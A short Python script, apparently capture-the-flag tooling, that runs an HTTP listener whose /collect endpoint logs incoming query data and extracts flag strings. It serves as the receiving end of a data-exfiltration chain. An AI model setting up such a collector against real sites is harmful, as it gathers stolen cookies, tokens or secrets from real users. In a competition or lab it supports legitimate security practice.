from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import urlparse, parse_qs, unquote
import re

class H(SimpleHTTPRequestHandler):
    def do_GET(self):
        u = urlparse(self.path)

        if u.path == "/collect":
            qs = parse_qs(u.query)
            d = unquote(qs.get("d", [""])[0])
            print("[COLLECT]", d, flush=True)

            for m in re.findall(r'(flag\{.*?\}|CTF\{.*?\}|DASCTF\{.*?\})', d, re.I):
                print("[FLAG]", m, flush=True)

            self.send_response(204)
            self.end_headers()
            return

        return super().do_GET()

if __name__ == "__main__":
    print("[+] serving on 0.0.0.0:9999")
    print("[!] production chain must expose this via trusted HTTPS, e.g. nginx/caddy reverse proxy")
    HTTPServer(("0.0.0.0", 9999), H).serve_forever()